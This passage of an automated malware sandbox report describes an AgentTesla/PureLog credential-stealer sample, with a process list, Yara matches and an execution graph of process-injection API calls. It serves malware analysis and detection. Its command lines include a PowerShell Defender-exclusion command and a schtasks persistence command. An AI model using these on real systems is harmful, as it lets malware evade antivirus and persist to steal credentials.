                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0xa10000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp
                                                                            Imagebase:0x680000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:10:08:57
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Imagebase:0x7ff71e800000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:10:08:57
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0xd0000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 68%, ReversingLabs
                                                                            • Detection: 38%, Virustotal, Browse
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:10:08:58
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                            Imagebase:0x7ff693ab0000
                                                                            File size:496'640 bytes
                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp
                                                                            Imagebase:0x680000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0x390000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0x3c0000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0x710000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:11.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:2.2%
                                                                              Total number of Nodes:363
                                                                              Total number of Limit Nodes:13
                                                                              execution_graph 42451 7a8e5f8 42452 7a8e533 42451->42452 42455 7a3fa90 42452->42455 42453 7a8e543 42456 7a3faaa 42455->42456 42460 7a3face 42456->42460 42475 ac003ed 42456->42475 42479 ac005c9 42456->42479 42483 ac001a8 42456->42483 42488 ac00328 42456->42488 42493 ac00427 42456->42493 42498 ac00562 42456->42498 42503 ac008e2 42456->42503 42507 ac0031d 42456->42507 42512 ac0091a 42456->42512 42517 ac001fa 42456->42517 42522 ac00619 42456->42522 42526 ac00818 42456->42526 42531 ac00515 42456->42531 42536 ac009d3 42456->42536 42541 ac00473 42456->42541 42546 ac00b53 42456->42546 42551 ac00110 42456->42551 42460->42453 42556 7a8d868 42475->42556 42560 7a8d860 42475->42560 42476 ac00407 42476->42460 42564 7a8d9f8 42479->42564 42568 7a8da00 42479->42568 42480 ac005fa 42480->42460 42484 ac00110 42483->42484 42572 7a8e088 42484->42572 42576 7a8e07c 42484->42576 42489 ac00335 42488->42489 42491 7a8d9f8 WriteProcessMemory 42489->42491 42492 7a8da00 WriteProcessMemory 42489->42492 42490 ac00ac0 42491->42490 42492->42490 42495 ac00441 42493->42495 42494 ac00bf6 42494->42460 42495->42494 42580 7a8d7b8 42495->42580 42584 7a8d7b0 42495->42584 42499 ac00568 42498->42499 42500 ac00250 42499->42500 42588 7a8dae8 42499->42588 42592 7a8daf0 42499->42592 42500->42460 42596 ac00eb7 42503->42596 42601 ac00ec8 42503->42601 42504 ac008fa 42508 ac00569 42507->42508 42509 ac00250 42507->42509 42510 7a8dae8 ReadProcessMemory 42508->42510 42511 7a8daf0 ReadProcessMemory 42508->42511 42509->42460 42510->42509 42511->42509 42513 ac009a1 42512->42513 42514 ac00250 42513->42514 42515 7a8d9f8 WriteProcessMemory 42513->42515 42516 7a8da00 WriteProcessMemory 42513->42516 42515->42514 42516->42514 42518 ac001fe 42517->42518 42520 7a8e088 CreateProcessA 42518->42520 42521 7a8e07c CreateProcessA 42518->42521 42519 ac00231 42520->42519 42521->42519 42606 7a8d938 42522->42606 42610 7a8d940 42522->42610 42523 ac00637 42527 ac0081e 42526->42527 42528 ac00bf6 42527->42528 42529 7a8d7b8 ResumeThread 42527->42529 42530 7a8d7b0 ResumeThread 42527->42530 42528->42460 42529->42527 42530->42527 42532 ac0048a 42531->42532 42533 ac00bf6 42532->42533 42534 7a8d7b8 ResumeThread 42532->42534 42535 7a8d7b0 ResumeThread 42532->42535 42533->42460 42534->42532 42535->42532 42537 ac008e1 42536->42537 42539 ac00eb7 2 API calls 42537->42539 42540 ac00ec8 2 API calls 42537->42540 42538 ac008fa 42539->42538 42540->42538 42543 ac00479 42541->42543 42542 ac00bf6 42542->42460 42543->42542 42544 7a8d7b8 ResumeThread 42543->42544 42545 7a8d7b0 ResumeThread 42543->42545 42544->42543 42545->42543 42547 ac00b57 42546->42547 42549 7a8d9f8 WriteProcessMemory 42547->42549 42550 7a8da00 WriteProcessMemory 42547->42550 42548 ac00250 42549->42548 42550->42548 42552 ac0011a 42551->42552 42554 7a8e088 CreateProcessA 42552->42554 42555 7a8e07c CreateProcessA 42552->42555 42553 ac00231 42554->42553 42555->42553 42557 7a8d8ad Wow64SetThreadContext 42556->42557 42559 7a8d8f5 42557->42559 42559->42476 42561 7a8d8ad Wow64SetThreadContext 42560->42561 42563 7a8d8f5 42561->42563 42563->42476 42565 7a8da48 WriteProcessMemory 42564->42565 42567 7a8da9f 42565->42567 42567->42480 42569 7a8da48 WriteProcessMemory 42568->42569 42571 7a8da9f 42569->42571 42571->42480 42573 7a8e111 CreateProcessA 42572->42573 42575 7a8e2d3 42573->42575 42577 7a8e111 CreateProcessA 42576->42577 42579 7a8e2d3 42577->42579 42581 7a8d7f8 ResumeThread 42580->42581 42583 7a8d829 42581->42583 42583->42495 42585 7a8d7f8 ResumeThread 42584->42585 42587 7a8d829 42585->42587 42587->42495 42589 7a8daf0 ReadProcessMemory 42588->42589 42591 7a8db7f 42589->42591 42591->42500 42593 7a8db3b ReadProcessMemory 42592->42593 42595 7a8db7f 42593->42595 42595->42500 42597 ac00ec8 42596->42597 42599 7a8d868 Wow64SetThreadContext 42597->42599 42600 7a8d860 Wow64SetThreadContext 42597->42600 42598 ac00ef3 42598->42504 42599->42598 42600->42598 42602 ac00edd 42601->42602 42604 7a8d868 Wow64SetThreadContext 42602->42604 42605 7a8d860 Wow64SetThreadContext 42602->42605 42603 ac00ef3 42603->42504 42604->42603 42605->42603 42607 7a8d940 VirtualAllocEx 42606->42607 42609 7a8d9bd 42607->42609 42609->42523 42611 7a8d980 VirtualAllocEx 42610->42611 42613 7a8d9bd 42611->42613 42613->42523 42827 16cd01c 42828 16cd034 42827->42828 42829 16cd08e 42828->42829 42834 5722c08 42828->42834 42843 5720ad4 42828->42843 42852 5721e97 42828->42852 42856 5721ea8 42828->42856 42835 5722c18 42834->42835 42836 5722c79 42835->42836 42838 5722c69 42835->42838 42876 5720bfc 42836->42876 42860 5722da0 42838->42860 42865 5722e6c 42838->42865 42871 5722d90 42838->42871 42839 5722c77 42844 5720adf 42843->42844 42845 5722c79 42844->42845 42847 5722c69 42844->42847 42846 5720bfc CallWindowProcW 42845->42846 42848 5722c77 42846->42848 42849 5722da0 CallWindowProcW 42847->42849 42850 5722d90 CallWindowProcW 42847->42850 42851 5722e6c CallWindowProcW 42847->42851 42849->42848 42850->42848 42851->42848 42853 5721ea8 42852->42853 42854 5720ad4 CallWindowProcW 42853->42854 42855 5721eef 42854->42855 42855->42829 42857 5721ece 42856->42857 42858 5720ad4 CallWindowProcW 42857->42858 42859 5721eef 42858->42859 42859->42829 42862 5722db4 42860->42862 42861 5722e40 42861->42839 42880 5722e58 42862->42880 42883 5722e47 42862->42883 42866 5722e2a 42865->42866 42867 5722e7a 42865->42867 42869 5722e47 CallWindowProcW 42866->42869 42870 5722e58 CallWindowProcW 42866->42870 42868 5722e40 42868->42839 42869->42868 42870->42868 42873 5722da0 42871->42873 42872 5722e40 42872->42839 42874 5722e47 CallWindowProcW 42873->42874 42875 5722e58 CallWindowProcW 42873->42875 42874->42872 42875->42872 42877 5720c07 42876->42877 42878 572435a CallWindowProcW 42877->42878 42879 5724309 42877->42879 42878->42879 42879->42839 42881 5722e69 42880->42881 42887 5724292 42880->42887 42881->42861 42884 5722e58 42883->42884 42885 5722e69 42884->42885 42886 5724292 CallWindowProcW 42884->42886 42885->42861 42886->42885 42888 5720bfc CallWindowProcW 42887->42888 42889 57242aa 42888->42889 42889->42881 42614 5727410 42615 572743d 42614->42615 42624 5726f7c 42615->42624 42618 5726f7c 3 API calls 42619 5727569 42618->42619 42628 5726f8c 42619->42628 42621 572759b 42622 5726f8c 3 API calls 42621->42622 42623 57275cd 42622->42623 42625 5726f87 42624->42625 42633 572711c 42625->42633 42627 5727537 42627->42618 42629 5726f97 42628->42629 42631 30083d2 3 API calls 42629->42631 42632 3005c9c 3 API calls 42629->42632 42630 572f1ab 42630->42621 42631->42630 42632->42630 42634 5727127 42633->42634 42635 5728612 42634->42635 42638 30083d2 42634->42638 42645 3005c9c 42634->42645 42635->42627 42639 30083e0 42638->42639 42640 3008693 42639->42640 42652 300ad42 42639->42652 42641 30086d1 42640->42641 42656 300ce30 42640->42656 42661 300ce20 42640->42661 42641->42635 42646 3005ca7 42645->42646 42647 3008693 42646->42647 42651 300ad42 2 API calls 42646->42651 42648 30086d1 42647->42648 42649 300ce20 3 API calls 42647->42649 42650 300ce30 3 API calls 42647->42650 42648->42635 42649->42648 42650->42648 42651->42647 42666 300ad71 42652->42666 42670 300ad78 42652->42670 42653 300ad56 42653->42640 42658 300ce51 42656->42658 42657 300ce75 42657->42641 42658->42657 42693 300cfe0 42658->42693 42697 300cfd1 42658->42697 42662 300ce51 42661->42662 42663 300ce75 42662->42663 42664 300cfe0 3 API calls 42662->42664 42665 300cfd1 3 API calls 42662->42665 42663->42641 42664->42663 42665->42663 42667 300ad78 42666->42667 42673 300ae70 42667->42673 42668 300ad87 42668->42653 42672 300ae70 2 API calls 42670->42672 42671 300ad87 42671->42653 42672->42671 42674 300ae81 42673->42674 42675 300aea4 42673->42675 42674->42675 42681 300b108 42674->42681 42685 300b0f8 42674->42685 42675->42668 42676 300ae9c 42676->42675 42677 300b0a8 GetModuleHandleW 42676->42677 42678 300b0d5 42677->42678 42678->42668 42682 300b11c 42681->42682 42684 300b141 42682->42684 42689 300a8b0 42682->42689 42684->42676 42686 300b11c 42685->42686 42687 300b141 42686->42687 42688 300a8b0 LoadLibraryExW 42686->42688 42687->42676 42688->42687 42690 300b2e8 LoadLibraryExW 42689->42690 42692 300b361 42690->42692 42692->42684 42694 300cfed 42693->42694 42695 300d027 42694->42695 42701 300c918 42694->42701 42695->42657 42698 300cfe0 42697->42698 42699 300d027 42698->42699 42700 300c918 3 API calls 42698->42700 42699->42657 42700->42699 42702 300c923 42701->42702 42704 300d938 42702->42704 42705 300ca44 42702->42705 42704->42704 42706 300ca4f 42705->42706 42707 3005c9c 3 API calls 42706->42707 42708 300d9a7 42707->42708 42712 300f708 42708->42712 42722 300f720 42708->42722 42709 300d9e1 42709->42704 42713 300f720 42712->42713 42714 300f75d 42713->42714 42733 5720d89 42713->42733 42739 5720d99 42713->42739 42745 5720db8 42713->42745 42751 5720dc8 42713->42751 42757 5720d95 42713->42757 42763 5720d91 42713->42763 42769 5720d8d 42713->42769 42714->42709 42724 300f751 42722->42724 42725 300f851 42722->42725 42723 300f75d 42723->42709 42724->42723 42726 5720d91 CreateWindowExW 42724->42726 42727 5720d95 CreateWindowExW 42724->42727 42728 5720dc8 CreateWindowExW 42724->42728 42729 5720db8 CreateWindowExW 42724->42729 42730 5720d99 CreateWindowExW 42724->42730 42731 5720d89 CreateWindowExW 42724->42731 42732 5720d8d CreateWindowExW 42724->42732 42725->42709 42726->42725 42727->42725 42728->42725 42729->42725 42730->42725 42731->42725 42732->42725 42734 5720d95 42733->42734 42735 5720ea2 42734->42735 42775 5721ca0 42734->42775 42778 5721bb0 42734->42778 42784 5721c90 42734->42784 42735->42735 42740 5720d95 42739->42740 42741 5720ea2 42740->42741 42742 5721ca0 CreateWindowExW 42740->42742 42743 5721c90 CreateWindowExW 42740->42743 42744 5721bb0 CreateWindowExW 42740->42744 42742->42741 42743->42741 42744->42741 42746 5720d95 42745->42746 42746->42745 42747 5720ea2 42746->42747 42748 5721ca0 CreateWindowExW 42746->42748 42749 5721c90 CreateWindowExW 42746->42749 42750 5721bb0 CreateWindowExW 42746->42750 42748->42747 42749->42747 42750->42747 42752 5720df3 42751->42752 42753 5720ea2 42752->42753 42754 5721ca0 CreateWindowExW 42752->42754 42755 5721c90 CreateWindowExW 42752->42755 42756 5721bb0 CreateWindowExW 42752->42756 42753->42753 42754->42753 42755->42753 42756->42753 42759 5720d9d 42757->42759 42758 5720ea2 42758->42758 42759->42757 42759->42758 42760 5721ca0 CreateWindowExW 42759->42760 42761 5721c90 CreateWindowExW 42759->42761 42762 5721bb0 CreateWindowExW 42759->42762 42760->42758 42761->42758 42762->42758 42764 5720d95 42763->42764 42765 5720ea2 42764->42765 42766 5721ca0 CreateWindowExW 42764->42766 42767 5721c90 CreateWindowExW 42764->42767 42768 5721bb0 CreateWindowExW 42764->42768 42766->42765 42767->42765 42768->42765 42770 5720d95 42769->42770 42771 5720ea2 42770->42771 42772 5721ca0 CreateWindowExW 42770->42772 42773 5721c90 CreateWindowExW 42770->42773 42774 5721bb0 CreateWindowExW 42770->42774 42772->42771 42773->42771 42774->42771 42776 5720aa8 CreateWindowExW 42775->42776 42777 5721cd5 42776->42777 42777->42735 42779 5721bdb 42778->42779 42781 5721c39 42778->42781 42779->42735 42780 5721c3b 42780->42735 42781->42780 42782 5720aa8 CreateWindowExW 42781->42782 42783 5721cd5 42782->42783 42783->42735 42785 5721ca0 42784->42785 42786 5720aa8 CreateWindowExW 42785->42786 42787 5721cd5 42786->42787 42787->42735 42788 3004668 42789 300467a 42788->42789 42790 3004686 42789->42790 42794 3004779 42789->42794 42799 3003e10 42790->42799 42792 30046a5 42795 300479d 42794->42795 42803 3004878 42795->42803 42807 3004888 42795->42807 42800 3003e1b 42799->42800 42815 3005c1c 42800->42815 42802 300702b 42802->42792 42804 3004888 42803->42804 42805 300498c 42804->42805 42811 3004248 42804->42811 42809 30048af 42807->42809 42808 300498c 42809->42808 42810 3004248 CreateActCtxA 42809->42810 42810->42808 42812 3005918 CreateActCtxA 42811->42812 42814 30059db 42812->42814 42816 3005c27 42815->42816 42819 3005c3c 42816->42819 42818 30070d5 42818->42802 42820 3005c47 42819->42820 42823 3005c6c 42820->42823 42822 30071ba 42822->42818 42824 3005c77 42823->42824 42825 3005c9c 3 API calls 42824->42825 42826 30072ad 42825->42826 42826->42822 42890 300d0f8 42891 300d13e 42890->42891 42895 300d2c8 42891->42895 42899 300d2d8 42891->42899 42892 300d22b 42896 300d2d8 42895->42896 42902 300c9e0 42896->42902 42900 300c9e0 DuplicateHandle 42899->42900 42901 300d306 42900->42901 42901->42892 42903 300d340 DuplicateHandle 42902->42903 42904 300d306 42903->42904 42904->42892 42437 7a3029d 42438 7a302a5 42437->42438 42440 ac00f7f 42437->42440 42441 ac00f4c 42440->42441 42443 ac00f82 42440->42443 42441->42438 42442 ac01113 42442->42438 42443->42442 42446 ac01203 42443->42446 42449 ac01208 PostMessageW 42443->42449 42447 ac01208 PostMessageW 42446->42447 42448 ac01274 42447->42448 42448->42443 42450 ac01274 42449->42450 42450->42443
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31fd524e9ec300d17ccbb75f7687ab9b00003b6c6beae70498208c64e87fef99
                                                                              • Instruction ID: 88bb83f3e5a151666576846aa8b94dc448cbe70eadaaa20b624cd254af5e9069
                                                                              • Opcode Fuzzy Hash: 31fd524e9ec300d17ccbb75f7687ab9b00003b6c6beae70498208c64e87fef99
                                                                              • Instruction Fuzzy Hash: 82A2C734A01229CFDB14DF68C994AD9B7B2FF89300F1581E9E549AB361DB31AE85CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6210f37bbe43e60c934ed46ff1bcdb7fcd2d784b5b577a36ee11088eec968c64
                                                                              • Instruction ID: 75e9751c20760a7b54d7cccc7e8cb02cbbf6a343aec24a0067c20a559fac7d7f
                                                                              • Opcode Fuzzy Hash: 6210f37bbe43e60c934ed46ff1bcdb7fcd2d784b5b577a36ee11088eec968c64
                                                                              • Instruction Fuzzy Hash: 56329A387012048FDB28DB69C568BAEB7F6AF89700F268469E605DB3E1DB30DD05CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b99a65e53f2380c367d8bfcffade4bbfe447150b9439692d9a19acf052f38068
                                                                              • Instruction ID: 4e3b0746a5ea409fd6f79ddb1a31e74e852e4840eea125960958b89f2b69fe28
                                                                              • Opcode Fuzzy Hash: b99a65e53f2380c367d8bfcffade4bbfe447150b9439692d9a19acf052f38068
                                                                              • Instruction Fuzzy Hash: D96147B4D1925ACBDF58EFA6C8406EDBBBABF8E300F10D029D429AB255DB345901CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0b12389c0b7fcc1a318f33afc1ff89c15cb37902c9b4d30a00d72d0a10ea389
                                                                              • Instruction ID: fc9d7a8f77f1b247090e8af4a0ac8545080ef0bbec517fb7724e8f55d4f9a8b0
                                                                              • Opcode Fuzzy Hash: a0b12389c0b7fcc1a318f33afc1ff89c15cb37902c9b4d30a00d72d0a10ea389
                                                                              • Instruction Fuzzy Hash: 12411CB4D1961ACBDB58DFAAC8406EEBBF6BF8E300F20D129D429A7255DB305901CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: decce6806b0cc7504e7bf3d211dffe0a40a3cf85b5a3ab095dcb6791cac2344d
                                                                              • Instruction ID: 889091b6b5d8423057eb911681844f6ad5327fcefd75e9d0620d9945c6393527
                                                                              • Opcode Fuzzy Hash: decce6806b0cc7504e7bf3d211dffe0a40a3cf85b5a3ab095dcb6791cac2344d
                                                                              • Instruction Fuzzy Hash: 9C21A3B1E056188BDB18CFABD8042DEBAF7AFC9300F04C13AE419AB258DB741846CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d2de1f43c125ff3d7c06ff45ffbec58c1589063d5a2bf85724837378321c0c54
                                                                              • Instruction ID: 793b79fdf0a6828e62eda7c639e44c2d0813ad38365558e672bf4fc16b261dfd
                                                                              • Opcode Fuzzy Hash: d2de1f43c125ff3d7c06ff45ffbec58c1589063d5a2bf85724837378321c0c54
                                                                              • Instruction Fuzzy Hash: C5213BB1E1561A8BDB58DF6789042EEBAB7AFC9300F14C06AC419A6265DB340A45CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d20789ef18904a33bee6cf4174725dbdf78e483da2a54ae3afa992f23a369c1d
                                                                              • Instruction ID: d5900a0e01f3f2610c03456bb3ec12126657c8057e77454039555bbd55956d29
                                                                              • Opcode Fuzzy Hash: d20789ef18904a33bee6cf4174725dbdf78e483da2a54ae3afa992f23a369c1d
                                                                              • Instruction Fuzzy Hash: 58A00240D9EA40E0C1602C121224BB4C03C121B050D037E00056B335820804C100004E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

